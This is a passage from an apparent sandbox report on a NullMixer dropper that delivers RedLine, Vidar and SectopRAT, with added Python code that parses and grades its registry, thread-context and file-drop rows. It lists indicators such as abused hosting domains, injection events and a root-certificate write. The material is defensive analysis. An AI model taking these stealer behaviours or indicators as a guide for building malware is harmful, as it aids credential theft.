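    """Dumps taken at the usual PE image base: the first candidates to carve for an unpacked payload."""
    return [r for r in regions if r["start"] == base]


if __name__ == "__main__":
    files, regions = parse_files(SAMPLE_FILES)
    for f in files:
        print(f"{classify(f):13} {f['sha256']} {f['path']}")
    print("blocklist:", blocklist(files))
    for r in image_base_regions(regions):
        print(f"PID {r['pid']} image-base dump, 0x{r['size']:X} bytes")
```

softokn3.dll is the file name of the Mozilla NSS soft-token library, which a browser stealer brings along to decrypt Firefox logins; compare its SHA256 with a clean Firefox install before deciding whether it is a dropped tool or a renamed payload. The region dumped at 0x400000 for PID 1608 (0x5D2000 bytes) is the first thing to carve for an unpacked PE.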

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win7-20240729-en

Max time kernel

56s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2268 set thread context of 1032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
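Added example, not from the report: the RunOnce, SetThreadContext and file-creation rows above parsed and graded. The RunOnce value named wextract_cleanup0 that runs advpack.dll,DelNodeRunDLL32 is registered by wextract (the IExpress self-extractor) to delete its IXP000.TMP directory at next logon; it launches nothing, so the "Adds Run key" hit on it is not persistence. A SetThreadContext call whose source and target are the same image file is a loader redirecting a thread in a second copy of itself rather than in a foreign process. The fourth sample row, a Run value under a made-up SID with made-up paths, is constructed so the persistence branch is exercised; it is not in the report.

```python
import re

# Constructed sample: three rows copied from the signature tables above, plus one
# hypothetical Run value (made-up SID and paths) so the persistence branch runs.
SAMPLE_EVENTS = r"""
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-0-0-0-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\Users\Admin\AppData\Roaming\updater.exe" C:\Users\Admin\AppData\Local\Temp\example.exe N/A
PID 2268 set thread context of 1032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
"""

SET_VALUE = re.compile(r'^Set value \((?P<kind>\w+)\) (?P<key>\S+) = "(?P<data>.*)" (?P<proc>\S+) \S+$')
THREAD_CTX = re.compile(r"^PID (?P<src>\d+) set thread context of (?P<dst>\d+) \S+ (?P<src_img>\S+) (?P<dst_img>\S+)$")
FILE_OP = re.compile(r"^File (?P<op>created|opened for modification) (?P<path>\S+) (?P<proc>\S+) \S+$")
AUTOSTART_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\")


def classify_autostart(key, data):
    """Tell the self-extractor's clean-up entry apart from a real autostart."""
    name = key.rsplit("\\", 1)[-1]
    if name.startswith("wextract_cleanup") and "advpack.dll,DelNodeRunDLL32" in data:
        # wextract (IExpress SFX) registers this RunOnce value itself: it deletes the
        # IXP000.TMP extraction directory at next logon and launches no payload.
        return "iexpress-cleanup"
    if AUTOSTART_KEY.search(key):
        return "persistence"
    return "other"


def triage(text):
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = SET_VALUE.match(line)
        if m:
            findings.append({"kind": "autostart", "verdict": classify_autostart(m["key"], m["data"]),
                             "process": m["proc"], "data": m["data"]})
            continue
        m = THREAD_CTX.match(line)
        if m:
            # Same image on both sides: the loader redirected a thread in a second copy
            # of itself rather than in a foreign process.
            same = m["src_img"].lower() == m["dst_img"].lower()
            findings.append({"kind": "thread-context",
                             "verdict": "self-injection" if same else "cross-process-injection",
                             "pids": (int(m["src"]), int(m["dst"])), "process": m["src_img"]})
            continue
        m = FILE_OP.match(line)
        if m:
            # An executable written into C:\Windows by something running out of Temp.
            in_windows = m["path"].lower().startswith("c:\\windows\\")
            from_temp = "\\temp\\" in m["proc"].lower()
            findings.append({"kind": "file",
                             "verdict": "system-dir-drop" if in_windows and from_temp else "file-write",
                             "process": m["proc"], "path": m["path"]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['kind']:15} {f['verdict']:25} {f['process']}")
```

The winnetdriv.exe write is the one row here that does describe the sample placing something of its own on disk: a Temp-resident setup.exe created an executable directly under C:\Windows, and that file later shows up as a running process in the System Language Discovery table.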

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{ED57F3A1-B47B-11EF-A5E9-FE7389BE724D} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\61d1121b032c3d74.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
